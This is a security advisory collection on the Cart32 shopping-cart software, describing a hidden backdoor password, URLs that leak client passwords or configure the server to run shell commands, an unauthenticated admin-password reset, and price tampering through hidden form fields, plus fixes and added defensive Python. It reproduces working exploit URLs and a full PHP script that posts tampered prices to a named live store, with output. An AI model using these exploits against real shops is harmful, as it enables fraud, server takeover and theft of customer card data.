COMMAND

    Cart32

SYSTEMS AFFECTED

    Any Win32-based web server using Cart32

PROBLEM

    The following is based on the Cerberus Information Security Advisory
    by David and Mark Litchfield.  The Cerberus Security Team has
    discovered a serious security hole in McMurtrey/Whitaker &
    Associates, Inc's Win32 e-Commerce shopping cart, Cart32, that can
    only be described as a blatant backdoor.  Within cart32.exe, the
    main file that provides the cart's functionality, there is a secret
    hidden password that can be used to obtain vital information such
    as other passwords.  Using these, an attacker can modify the
    shopping cart's properties so that arbitrary commands may be run on
    the server, and can gain access to customers' credit card details,
    shipping addresses and other highly sensitive information.

    Within cart32.exe there is a secret backdoor password of "wemilo"
    (found at file offset 0x6204), known internally as the
    Cart32Password.  With knowledge of this password an attacker can go
    to one of several undocumented URLs such as

        http://charon/scripts/cart32.exe/cart32clientlist

    and obtain a list of the passwords for each Cart32 client (a client
    is essentially a shop site).  Although these passwords appear to be
    hashed, they can still be used.  For example, they can be embedded
    in a specially crafted URL that will allow the attacker to prime the
    server to run an arbitrary command when an order is confirmed:

        http://charon/scripts/c32web.exe?TabName=Cart32%2B&Action=Save+Cart32%2B+Tab&SaveTab=Cart32%2B&Client=foobar&ClientPassword=e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin=&AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave=Run+External+Program&UseCMDLine=Yes&CMDLine=cmd.exe+%2Fc+dir+%3E+c%3A%5Cfile.txt

    This URL will set the cart's properties to spawn a shell, perform a
    directory listing and redirect the output to a file called file.txt
    in the root of the C: drive when an order is confirmed.  After doing
    this the attacker would then create a spurious order and confirm it,
    thus executing the command.  (Please note that the above URL is
    pertinent only to an internal Cerberus server; password details and
    client info would need to be changed to reflect the site in
    question.)

    Further to this, the Cerberus Security Team has found what is,
    perhaps, a second backdoor.  By going directly to the following URL

        http://charon/scripts/c32web.exe/ChangeAdminPassword

    it is possible to change the administrative password without
    knowledge of the previous one.

    Because the 'wemilo' string is stored as Unicode, try looking for
    "w\0e\0m\0i\0l\0o\0".  Also, there is a version of 'strings' for NT
    that finds both ASCII and Unicode strings, available at
    www.sysinternals.com in the 'miscellaneous' section of their NT
    tools.
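    As an added check (not part of the advisory or of the L0pht tool),
    the following Python scans a binary for a string in both its ASCII
    and UTF-16LE ("wide") forms and reports the file offsets, so an
    administrator can confirm whether a cart32.exe still carries the
    default password or has already been patched; the sample blob is
    constructed, and the file path in backdoor_string_present is
    whatever the administrator supplies.

```python
# Added example, not from the advisory: locate every ASCII and UTF-16LE
# occurrence of a string in a binary blob and report the byte offsets.
# SAMPLE_BLOB is a constructed stand-in for a real cart32.exe.

def find_string_offsets(data: bytes, needle: str) -> dict:
    """Return {'ascii': [offsets], 'utf16le': [offsets]} for needle in data."""
    hits = {}
    for label, enc in (("ascii", "ascii"), ("utf16le", "utf-16-le")):
        pattern = needle.encode(enc)   # e.g. b"wemilo" or b"w\0e\0m\0i\0l\0o\0"
        offsets, start = [], 0
        while (idx := data.find(pattern, start)) != -1:
            offsets.append(idx)
            start = idx + 1
        hits[label] = offsets
    return hits

def backdoor_string_present(path: str, needle: str = "wemilo") -> bool:
    """True if the file at path still contains needle in either encoding."""
    with open(path, "rb") as f:
        data = f.read()
    hits = find_string_offsets(data, needle)
    return bool(hits["ascii"] or hits["utf16le"])

# Constructed sample: filler, an ASCII copy at offset 16, more filler,
# then a wide (UTF-16LE) copy at offset 32.
SAMPLE_BLOB = (b"\x00" * 16 + b"wemilo" + b"\x00" * 10
               + "wemilo".encode("utf-16-le") + b"\x00" * 8)

if __name__ == "__main__":
    print(find_string_offsets(SAMPLE_BLOB, "wemilo"))
```

    After running a patch such as cartfix, the same scan on the real
    file should report no hits for the default string in either encoding.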

    Another interesting Cart32 command was mentioned by Cassius.  Ex:

        http://example.com/cgi-bin/cart32.exe/expdate

    This causes an error and displays a debugging page with server
    variables, the contents of the Cart32 administration directory and,
    sometimes, the contents of cgi-bin.  This makes it easy to spot
    misconfigured Cart32 installs (customer databases installed in the
    cgi-bin directory).  You could fix this one in a hex editor by
    changing the /EXPDATE string to something random.

    Bunny69 added more.  While messing around with Cart32, he discovered
    the following bug (the existence of such bugs in e-carts is well
    known, but it had never been found in Cart32).  When a user clicks
    on a product he is interested in, he sees a form where he can add
    this product to his cart; the problem is that the price of the
    product is passed to the Cart32 system by a "hidden" HTML form
    field named Price.  A simple edit of this field will permit a
    malicious attacker to buy products at the desired price (probably
    $0).  This was tested on versions 2.5a and 3.0.

    Exploiting this hole is extremely easy: one simply saves the web
    page of the desired product to disk, edits the HTML source, changes
    the price to 0, opens the page again and submits the form.  Voila, a
    nice new Porsche 911 for the nice price of $1.99.

    cart32.phtml (a PHP exploit for Cart32 Stupidity):

    <?php
    /*
    
       Caution - long lines ahead.
    
       Cart32.phtml
       Bypass lame "security" options by providing our own referer
       and tainted data via POST.
       cdi@thewebmasters.net
    
      PostToHost()
        Heavily modified version of Rasmus' PostToHost function
        It's generic enough to handle any method containing
        just about any data.
    
        $data: urlencoded QUERY_STRING format
        $cookie: urlencoded cookie string format (name=value;name=value).
    */
    
    function PostToHost($host="",$port="80",$method="POST",$path="",$data="",$refer="",$client="",$cookie="")
    {
        $fp = fsockopen($host,$port);
        if(!$fp) { echo "Failed to open port"; exit; }
        // HTTP header lines end in CRLF; the Host header lets
        // name-based virtual hosts route the request correctly.
        fputs($fp, "$method $path HTTP/1.0\r\n");
        fputs($fp, "Host: $host\r\n");
        if($cookie != "") { fputs($fp, "Cookie: $cookie\r\n"); }
        if($refer  != "") { fputs($fp, "Referer: $refer\r\n"); }
        if($client != "") { fputs($fp, "User-Agent: $client\r\n"); }
        if($method == "POST")
        {
            fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
            fputs($fp, "Content-length: " . strlen($data) . "\r\n");
        }
        // The empty line terminates the headers; the body follows it
        // and must be exactly Content-length bytes long.
        fputs($fp, "Connection: close\r\n\r\n");
        if($method == "POST")
        {
            fputs($fp, $data);
        }
        // Read the complete response: status line, headers and body.
        $results = "";
        while(!feof($fp))
        {
            $results .= fgets($fp, 1024);
        }
        fclose($fp);
        return $results;
    }
    
    // Whee, now all we need to do is set up the data
    $host = 'www.cart32.com';
    $port = 80;
    $method = "POST";
    $path = '/cgi-bin/cart32.exe/justsocks-AddItem';
    $refer = 'www.IGuessYouDontTakeYourOwnAdvice.com';
    // And even if they did, we could set the Referer to match
    // anything we wanted.
    
    $client = 'CDI Spoof (v1.0)';
    $cookie = "";
    
    // Real price of this product was $6.99
    $data = 'Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite';
    
    // And now call the function
    
    $raw = PostToHost($host,$port,$method,$path,$data,$refer,$client,$cookie);
    
    print "<PRE>\n\n";
    print " Host: $host\n Port: [$port]\n Method: [$method]\n Path: [$path]\n";
    print " Referer: [$refer]\n Client: [$client]\n Cookie: [$cookie]\n";
    print " Data: [$data]\n";
    print "</PRE>\n";
    print "<P>Results of operation:<BR><HR NOSHADE><P>\n";
    print "$raw\n";
    ?>

    The JustSocks site is real and is hosted by Cart32.com - the  data
    sent above resulted in the following: (html removed)

        Host: www.cart32.com
        Port: [80]
        Method: [POST]
        Path: [/cgi-bin/cart32.exe/justsocks-AddItem]
        Referer: [www.IGuessYouDontTakeYourOwnAdvice.com]
        Client: [CDI Spoof (v1.0)]
        Cookie: []
        Data: [Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black&t2=d-Color%3BBlack%3BWhite]

    Results of operation:

        HTTP/1.1 200 OK
        Server: Microsoft-IIS/4.0
        Date: Tue, 23 May 2000 20:54:04 GMT
        Content-type: text/html
        Set-Cookie: Cart32-JUSTSOCKS=.3478662; path=/; expires=Thursday, 25-May-2000 01:01:01 GMT

SOLUTION

    Cerberus  recommends   that  the   following  steps   be  actioned
    immediately.  Cerberus has tested this in their labs and the  Cart
    functionality will not be broken by following these steps.

        1) Download a Hex Editor such as UltraEdit and edit cart32.exe
           changing the  "wemilo" password  to something  else.   This
           will address the first issue.

        2) Because c32web.exe is the administration program for Cart32
           only site administrators will need  access to it.  Set  the
           NTFS permissions on this  file so that only  Administrators
           have access to  it.  This  way anyone attempting  to access
           this file to change the admin password will be prompted for
           an NT account  and password.   For other "servers"  such as
           Windows 95 and 98 Cerberus recommends removing this file.

    Dildog and Weld Pond from L0pht made the following fix.  The Cartfix
    program is a quick temporary solution for users waiting for a
    permanent fix from the Cart32 vendor, McMurtrey/Whitaker &
    Associates.  The Cartfix program searches for the secret backdoor
    password in the cart32.exe program and replaces it with a random
    backdoor password.  It changes the ACL on the c32web.exe
    administration program so that anonymous users cannot change the
    administrator password for Cart32.  This ACL fix will only work on
    Windows NT/2000 systems.

    This patch in no way makes the Cart32 software secure.  It merely
    eliminates the two problems detailed in the Cerberus Information
    Security advisory.  The security problems in this software are at a
    basic design level and may take several days for the vendor to fix.
    This patch will allow users of Cart32 to be safe from these high
    risk vulnerabilities while awaiting this fix.  Executable file:

        http://www.l0pht.com/advisories/cartfix.exe

    Source code:

        http://www.l0pht.com/advisories/cartfixsrc.zip

    You must be logged on as administrator to run the program.   Press
    the  browse  button  and  select  the  directory that contains the
    cart32 software.  This is  usually cgi-bin or scripts.   After the
    directory  is  selected  press   'patch'  to  patch  your   cart32
    installation.

    As for what Bunny69 discovered, that "hole" is avoided by setting
    "Domain(s) to Accept Orders" in the 'Advanced' tab.  If the referral
    URL does not match one of the domains provided, the order will not
    go through.  To quote from Cart32 v3.0 Help:

        Domain(s) To Accept Orders
        This is a list of domain names or ip addresses in which to
        accept orders.  This would be your website.  This prevents a
        user from downloading a page containing product information and
        then changing the price or other parameter and then submitting
        the order.  You can enter one domain name or several separated
        by commas.  Ex. www.cart32.com or www.cart32.com, cart32.com,
        207.150.83.60 (END QUOTE)

    Of course, there are ways around the referral check, which is why
    the "Require POST" option exists: the form must be submitted using
    'POST' and not 'GET'.  Again, there are ways to avoid that check
    (for example, by writing a simplistic "web browser" of one's own).
    Since neither check is a real safeguard, all Cart32 users should
    skim through their orders for any noticeable price errors.
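    As an added illustration (not Cart32's code), here is how a cart's
    AddItem handler should treat the price: look it up server-side by
    PartNo and ignore the submitted Price field entirely, so neither a
    Referer check nor a POST requirement has to carry the weight.  It
    also includes the review routine recommended above, flagging stored
    order lines whose price differs from the catalog.  The catalog, the
    form body (which reuses the field layout of the PHP script's POST
    data) and the order records are constructed samples.

```python
# Added example, not Cart32 code: the server derives the price from its
# own catalog by PartNo and ignores any client-supplied Price field, and
# an audit flags stored orders whose price disagrees with the catalog.
# CATALOG, SAMPLE_FORM and SAMPLE_ORDERS are constructed sample data.
from urllib.parse import parse_qs

# Constructed catalog: the server's price list is the only authority.
CATALOG = {"F6092": 6.99, "A1000": 1299.00}

def add_item(form_body: str) -> dict:
    """Build a cart line from an urlencoded AddItem body, ignoring Price."""
    form = parse_qs(form_body, keep_blank_values=True)
    part = form.get("PartNo", [""])[0]
    if part not in CATALOG:
        raise ValueError(f"unknown PartNo {part!r}")
    qty = int(form.get("Qty", ["1"])[0])
    if qty < 1:
        raise ValueError("Qty must be positive")
    # A submitted Price is never used; a mismatch is recorded as evidence
    # of a tampered form so the order can be reviewed.
    submitted = form.get("Price", [""])[0]
    tampered = submitted != "" and float(submitted) != CATALOG[part]
    return {"PartNo": part, "Qty": qty, "Price": CATALOG[part],
            "price_tampered": tampered}

def audit_orders(order_lines):
    """Return stored order lines whose price does not match the catalog."""
    bad = []
    for line in order_lines:
        expected = CATALOG.get(line["PartNo"])
        if expected is None or abs(line["Price"] - expected) > 0.005:
            bad.append(line)
    return bad

# Constructed sample: same field layout as the advisory's POST body, with
# a client-chosen Price for a $6.99 item.
SAMPLE_FORM = ("Price=1000.56&Item=Wigwam+Triathlete+Ultra-Lite&PartNo=F6092"
               "&Qty=5&p1=XL&t1=d-Size%3BS%3BM%3BL%3BXL&p2=Black"
               "&t2=d-Color%3BBlack%3BWhite")
# Constructed order records as a cart might store them.
SAMPLE_ORDERS = [
    {"order": 1, "PartNo": "F6092", "Qty": 2, "Price": 6.99},
    {"order": 2, "PartNo": "A1000", "Qty": 1, "Price": 1.99},
    {"order": 3, "PartNo": "F6092", "Qty": 1, "Price": 0.0},
]

if __name__ == "__main__":
    print(add_item(SAMPLE_FORM))
    print([o["order"] for o in audit_orders(SAMPLE_ORDERS)])
```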